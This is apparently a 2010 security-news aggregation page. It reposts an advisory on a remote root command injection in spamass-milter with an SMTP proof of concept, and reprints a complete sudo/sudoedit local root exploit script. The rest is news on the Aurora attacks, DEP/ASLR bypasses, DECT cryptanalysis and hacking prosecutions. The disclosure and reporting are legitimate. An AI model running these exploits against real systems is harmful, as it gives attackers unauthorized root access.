uncompiled.com

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif

debug(D_FUNC, “mlfi_envrcpt: enter”);

if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */

char buf[1024];
char *fmt=”%s -bv \”%s\” 2>&1″;

#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

debug(D_RCPT, “calling %s”, buf);

#if defined(__FreeBSD__) /* popen bug – see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, “Could not lock popen mutex: %
s”, strerror(rv));
abort();
}
#endif

p = popen(buf, “r”); [1]
if (!p)
{
debug(D_RCPT, “popen failed(%s). Will not
expand aliases”, strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:”|touch /tmp/foo”
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r–r– 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said.”But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more dfficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by using a combination of several attack techniques chained together.The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing application to execute data from portions of the memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SeHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source

From: Kingcope
Date: Tue, 02 Mar 2010 00:08:44 +0100

Just for the record.

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit < < _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

cheers,
kingcope

Source

In a US Senate Committee on Commerce, Science and Transportation hearing, security experts have expressed extreme concern about US defences against cyber-attacks. Former vice-admiral and head of National Intelligence Michael McConnell even went as far as claimingPDF that the US would be on the losing side should a hostile power launch a cyber war against it. This is not, according to McConnell, because US security staff are less talented or because its technology is inferior, but rather the US is vulnerable because it is the best networked country – for which reason it also has the most to lose.

It is precisely this state of affairs which the recently passed Cybersecurity Enhancement Act of 2009 is intended to resolve. It aims to ensure, by means of training, research and better coordination, that the government and government agencies are better protected against attacks originating from cyberspace. The Act still has to pass through the US Senate.

James Lewis of the Center for Strategic and International Studies (CSIS) also emphasisedPDF US vulnerability to attacks. According to Lewis, it is known that countries such as China and Russia are already carrying out espionage to determine how they can disable the US electricity grid. He believes that they and other countries are now in a position to be able to knock out the electricity grid in the event, for example, of a conflict over Taiwan or Georgia. However he thinks that it unlikely that China or Russia would go down this route, as it would be too great a risk politically, comparable to bombing a power plant, and would trigger a vigorous US reaction. In addition, he notes, even hostile states would suffer should, for example, Wall Street be knocked out.

However Lewis plays down concerns about terrorist attacks, saying that If terrorists were really in a position to carry out cyber-attacks, they would already have done so. The belief that they are in a position to do so, but have so far held back for whatever reason is “ridiculous”. Terrorists are, in his opinion, crazy people. Lewis warns that this situation could change if hostile powers were to provide terrorists with the requisite knowledge and skills. Lewis feels that at present, neither China nor Russia would cooperate with extremists.

Nonetheless, the US and the US economy is already being bled by constant small-scale cyber-attacks. According to Lewis, theft of important information and attacks by cyber-criminals are already doing immense damage to both business and government. If no action is taken, the patient will, Lewis told the hearing, eventually bleed to death – therefore he considers passage of the Act to be an urgent necessity.

Source

Intel this week said it was the victim of a sophisticated cyberattack that occurred in January around the same time cybercriminals compromised systems at Google, Adobe and more than 30 other large companies.

In its annual 10-K report, a summary of a public company’s performance required by the U.S. Securities and Exchange Commission, Intel said hackers regularly attempt to infiltrate its information technology systems — and are sometimes successful.

“One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicized security incident reported by Google,” Intel wrote in the filing, which was submitted Monday.

Intel did not provide any specifics about the attack, but said hacking attempts may be the result of espionage or others seeking to harm the company.

“It routinely happens,” Intel spokesman Chuck Mulloy told SCMagazineUS.com on Tuesday. “It is not unusual for us to see these sorts of attacks. As a matter of policy, we don’t talk about specifics.”

Mulloy said he could not confirm or deny if the attack that Intel suffered in January was part of the same wave of attacks that hit Google, Adobe and others.

“We mentioned Google because it was very prominent in the news at the time we saw that particular attack,” Mulloy said. “Based on what we know right now, there was no IP [intellectual property] loss.”

In the filing, Intel said it works to detect and investigate cyberattacks to prevent them from recurring, but sometimes the company is not aware of incidents that have occurred, or their effects.

Hacking incidents could lead to the unauthorized use or publication of trade secrets or other confidential business information, Intel said. In addition, cyberattacks also could negatively impact the value of a company’s investments in research and development, along with relationships with third parties and customers.

“Our business could be subjected to significant disruption, and we could suffer monetary and other losses, including the cost of product recalls and returns and reputational harm, in the event of such incidents and claims,” Intel said.

Cyberattacks cost enterprises an average of $2 million per year due to a loss of productivity, revenue and customer trust associated with such events, according to a study released Monday by Symantec.

In January, Google disclosed that its systems were compromised by organized and well-resourced cybercriminals, believed to be operating out of China and who stole intellectual property. The attacks were dubbed “Operation Aurora.”

Other companies reportedly targeted in Operation Aurora included Yahoo, Symantec, Juniper Networks, Northrop Grumman and Dow Chemical, according to the Washington Post, which cited unnamed congressional and industry sources.

Source

BEIJING (Reuters) – U.S. government analysts believe a Chinese man with government links wrote the key part of a spyware program used in hacker attacks on Google last year, the Financial Times reported on Monday.

The man, a security consultant in his 30s, posted sections of the program to a hacking forum where he described it as something he was “working on,” the paper said, quoting an unidentified researcher working for the U.S. government.

The spyware creator works as a freelancer and did not launch the attack, but Chinese officials had “special access” to his programing, the report said.

“If he wants to do the research he’s good at, he has to toe the line now and again,” the paper quoted the unnamed U.S. government researcher saying.

“He would rather not have uniformed guys looking over his shoulder, but there is no way anyone of his skill level can get away from that kind of thing. The state has privileged access to these researchers’ work.”

The report did not say how analysts knew about the man’s government ties.

The allegations over the spyware are the latest episode in a dispute that has pitted Google and the United States against China, with its wall of Internet controls and legions of hackers.

In January, the giant internet search engine company, Google, threatened to pull back from China and shut its Google.cn Chinese-language portal over complaints of censorship and sophisticated hacking from within China.

Washington has backed those criticisms and urged Beijing to investigate hacking complaints thoroughly and transparently. Beijing has said it opposes hacking.

The Financial Times report also quoted unnamed sources backing a New York Times report that analysts had traced the online attacks to two Chinese educational institutions, the prestigious Shanghai Jiaotong University and the Lanxiang vocational school.

The two establishments have denied the reports. And the allegation that the latter, a high-school level institute that also trains hairdressers, chefs and car mechanics, could take on one of the world’s most powerful Internet firms, have been widely mocked in Chinese cyberspace.

“How can these future cooks be such powerful hackers?” a web user from Zhejiang province said on the portal www.163.com.

The use of the school’s IP address could simply mean that hackers had taken over its computers to hide their tracks.

But Lanxiang’s website also claims to have the “biggest” computer laboratory in the world, a boast it says is confirmed by Guinness World Records.

There was less online comment about the well-respected Jiaotong University, which attracts top graduates and has a School of Information Security Engineering.

(Reporting by Emma Graham-Harrison; Editing by Alex Richardson)

Source

Over the weekend, my cloud computing infrastructure survived a major hacking attack. Here is what happened and what it took to recover it.

This weekend my servers out in the cloud space fended off a major hacking attack across two of the systems that I have given the public access to use them. The attack started simply on Friday night as a simple series of scans to see if there was anything in the IP space that I am using. This is the fairly standard attack pattern that many information security people see every day. Thinking that this was normal I closed up shop on Friday and went home.

On Sunday I got an alert from the system that it had hung and when I went to go try to take a look at it using HTTP and SFTP the computer simply would not respond, there was no way to access it. In the control panel provided by the company I use for cloud hosting, I simply rebooted the box thinking that it was hung on a process that was keeping the box from being accessed. Over Sunday night, I got three more alerts that that the box had hung.

Monday morning when I went into work I rebooted the box again (this is a low priority box with almost no regular use over the weekend) and dove into the error logs for the box.

Over the Saturday Sunday time period someone had seriously tried to get into the computer. Over 250 gigs of access logs and over 300 gigs of error logs had almost consumed the disk space that I was using. The computer was not simply hung on a process, it had been resource starved because during the hacking attack the hacker had hit the system so hard that there were no more ports open to make a legitimate connection. They had towards the end of the attack (Sunday night) hit the computers with what looks like a simple denial of service attack at towards the end of the attack.

My thoughts on this is that, my computer survived and came back to operations with a simple reboot of the cloud computer to free up resources that had been consumed during the attack. No data was lost or stolen from the system and its role is to deliver Multi-media and provide data back to a Learning Management System. This meant the loss of some ability for the LMS but nothing that would have killed the entire system.

The 300 Gigs of error logs is over kill, the assumption was that at some point the hacker or hackers got angry enough that they could not get into the system that they simply did a Denial of Service against the box aiming to resource starve the system and cause problems for the System Administrator over the weekend. I do not think they knew it was on the cloud or that it was a simple matter of rebooting the box to restore services.

The hacker or hackers had failed in getting into the box, which is good, but resorted to DDOS to cause resource starvation as a final act. I do not think we are dealing with a true professional, but I do think we are dealing with a person who is a step above a script kiddy. They had access to an awesome level of firepower for their DDOS, we logged thousands of IP’s Sunday night. My belief on this one is that the person or persons had access to a botnet or a very large number of compromised systems to make this work.

I paid 20 cents a gig in bandwidth costs for the attack, with the 500 gigs of traffic roughly aimed at the system according to my monitor I paid 100 dollars to my cloud service provider for bandwidth consumed during the attack.

I only had temporary loss of one system because of the way that we distributed the cloud architecture across multiple systems in different data centers. As users switched over to different data centers, the system performed as architected, people were able to get their data over the weekend and nothing was truly slowed down or otherwise inaccessible during the attack.

It took two hours to go through the log files on the system to see what had happened. It took 15 minutes to generate the report to IT. This is literally the quickest I have ever gone through an attack, with clean up and with log analysis ever. It is also the cheapest attack I have ever dealt with in terms of loss or dollar costs associated with an attack ever. Which made for a fun hacking attack with a ton of data to use in the classroom and share. The good part is that a distributed architecture in this case worked which validates the way we built the cloud based system with fail over in mind, not necessarily a hacking attack induced failure of a system.

It is possible to attack a cloud computing system, and it is possible to resource starve a cloud computer, but in the longer run survivability and the ability to get to data relies on the architecture that the system was initially built around. If you are building a cloud space for your company, think in terms of survivability and fail over if a system in your cloud space fails for any reason and how to recover and still present data to the end user. Hacking attacks happen, and hackers will get angry and try to DDOS your site off the planet, how you architect your cloud space and cloud services will help you survive hackers as well as the occasional other failures in the system.

Source

As the world becomes increasingly dependent on information technology and digital communications, persistent vulnerabilities — some of which have been known for 50 years — continue to expose the world’s networks and applications to attacks.

“In 2009, the most notable trend is the continued use of existing attack techniques despite the security industry’s awareness of these vulnerabilities,” concluded a Global Security Report that Trustwave released at the Black Hat Federal Briefings in Washington.

Nicholas Percoco, senior vice president of Trustwave’s SpiderLabs, said enterprise administrators are overlooking basic security threats while chasing the newest vulnerabilities. Meanwhile, attackers are taking advantage of the tried-and-true vulnerabilities in addition to the latest zero-day flaws.

Gregory Schaffer, assistant secretary of cybersecurity and communications at the Homeland Security Department, said at the conference that information security should be part of basic enterprise policies, but that message has not yet been heard by top executives.

“We have moved into a space where cybersecurity is central to all business functions,” he said in his keynote address. “But some of the issues we talked about a dozen years ago we are still talking about today. We haven’t made our point to those who don’t do this for a living.”

Security experts from a dozen countries gathered at the conference to immerse themselves in the bits and bytes of the latest research by engineers, analysts and hackers who deconstruct and probe for weak points in software and hardware.

While networks and applications remain vulnerable to old exploits, the latest hardware security devices also will yield their secrets to a determined attacker.

Using an electron microscope to operate at the nanometer scale and Adobe Photoshop to plan his attack, security engineer Christopher Tarnovsky was able to reverse-engineer the family of chips from Infineon Technologies AG, which includes its Trusted Platform Module implementation; gain access to the chip’s data bus; and listen to unencrypted code.

It took him six months of work and the effort would cost an estimated $200,000 to do commercially, said Tarnovsky, who runs Flylogic Engineering and specializes in analyzing semiconductor security. But in the end, “I can get any piece of information stored on the chip,” he told his Black Hat audience.

Source

Swedish investigators are probing a hacker U.S. authorities accuse of unlawfully intruding into Cisco Systems, NASA’s Ames Research Center and NASA’s Advanced Supercomputing Division, the authorities said Monday.

Philip Gabriel Pettersson, known in the hacking world as “Stakkato,” allegedly seized computer code that controls internet traffic. After the 2004 breach of Cisco, the proprietary source code for Cisco’s IOS operating system was discovered on a Russian website.

Pettersson was indicted in the United States in May on five hacking counts, (.pdf) but could not be brought from Sweden to the United States for trial. Sweden does not extradite its own citizens, but said it was examining whether to prosecute him in Sweden after U.S. authorities in San Francisco initiated that request.

“The intrusions to Cisco Company and NASA are regarded as computer intrusion according to Swedish law,” Swedish prosecutor Chatrine Rudstrom told federal prosecutors in San Francisco, according to documents released Monday.

Still, Rudstrom told San Francisco federal authorities that Sweden was not guaranteeing it would charge the 21-year-old suspect.

Petterrson was convicted in 2007 of invading the networks of three Swedish universities and ordered to pay $25,000 in damages. He was 16 at the time of the intrusions.

Source

Cryptographers have broken the proprietary encryption used to prevent eavesdropping on more than 800 million cordless phones worldwide, demonstrating once again the risks of relying on obscure technologies to remain secure.

The attack is the first to crack the cipher at the heart of the DECT, or Digital Enhanced Cordless Telecommunications, standard, which encrypts radio signals as they travel between cordless phones in homes and businesses and corresponding base stations. A previous hack, by contrast, merely exploited weaknesses in the way the algorithm was implemented.

The fatal flaw in the DECT Standard Cipher is its insufficient amount of “pre-ciphering,” which is the encryption equivalent of shaking a cup of dice to make sure they generate unpredictable results. Because the algorithm discards only the first 40 or 80 bits during the encryption process, it’s possible to deduce the secret key after collecting and analyzing enough of the protected conversation.

“This standard, as with everything else we have broken, has been designed some 20 years ago, and it is proprietary encryption,” said Karsten Nohl, one of the cryptographers who helped devise the attack. “It relied on the fact that the encryption was unknown and hence could not be broken. This is a case where something that has some potential for being strong is broken by just this one design decision that in any public review would have been spotted immediately.”

Nohl, 28, is the same University of Virginia microscope-wielding reverse engineer to crack the encryption in the world’s most widely used smartcard. In December, he struck again after devising a practical attack for eavesdropping on cellphone calls.

He and fellow researchers Erik Tews of the Darmstadt University of Technology and Ralf-Philipp Weinmann of the University of Luxembourg, plan to present their findings Monday at the 2010 Fast Software Encryption workshop in Korea.

Like several of Nohl’s previous hacks, it began with nitric acid and an electron microscope. After dissolving away the epoxy on the silicon chip and then shaving down and magnifying the section dedicated to the DECT encryption, he was able to glean key insights into the underlying algorithm. He then compared the findings against details selectively laid out in a patent and exposed during a debug process.

The results of all three probe methods revealed the fatally insufficient amount of pre-ciphering in the DECT Standard Cipher.

In practical terms, the attack works by collecting bits of the encrypted data stream with known unencrypted contents. In cordless phones, this often comes from a device’s control channel, which broadcasts a variety of predictable data, including call duration and button responses. Sniffing an encrypted conversation with a USRP antenna and the average PC, an attacker would need to collect about four hours of data to break the key in typical scenarios.

In others – such as where DECT is used in restaurants and bars to wirelessly zap payment card details – the time needed to crack the key could be dramatically shorter, Nohl said. The time can also be sped up in a variety of other ways, including by adding certain types of graphics cards to beef up the power of the attacking PC. In some cases, the attack can retrieve the secret key in 10 minutes.

“We expect that some smarter cryptographers than ourselves will find better attacks, of course,” Nohl told El Reg. “We found the algorithm and then implemented the first attack. It’s almost guaranteed that this is not the best attack.”

The DECT Forum, the international body that oversees the standard, said it takes the attack scenarios laid out in the paper seriously and “continues to investigate their applicability.”

The crack of DECT is only the latest time Nohl has defeated the proprietary encryption of a device with critical mass. His 2008 attack on the Mifare Classic smartcard used similar techniques of filing down a silicon chip and then tracing the connections between transistors. His proposed attack of GSM encryption affects cellphones used by more than 800 carriers in 219 countries. ®

Source